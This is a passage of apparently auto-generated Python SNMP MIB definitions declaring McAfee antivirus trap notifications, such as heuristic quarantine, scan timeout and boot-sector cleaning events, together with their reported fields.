"mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_DELETE_ERR_HEURISTICS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1055)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_QUARANTINED_HEURISTICS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1056)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_QUAR_ERROR_HEURISTICS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1057)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_TIMEOUT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1059)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_BOOT_SECTOR_CLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1060)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_CLEANERROR_BOOTSECTOR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1061)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_ALERTERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1062)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_OPTIONSERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1063)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SERVICE_STARTED_1064 = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1064)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SERVICE_ENDING_1065 = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1065)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCED_START_TASK_OK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1066)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCHED_START_TASK_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1067)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCED_TASK_END_OK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1068)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), 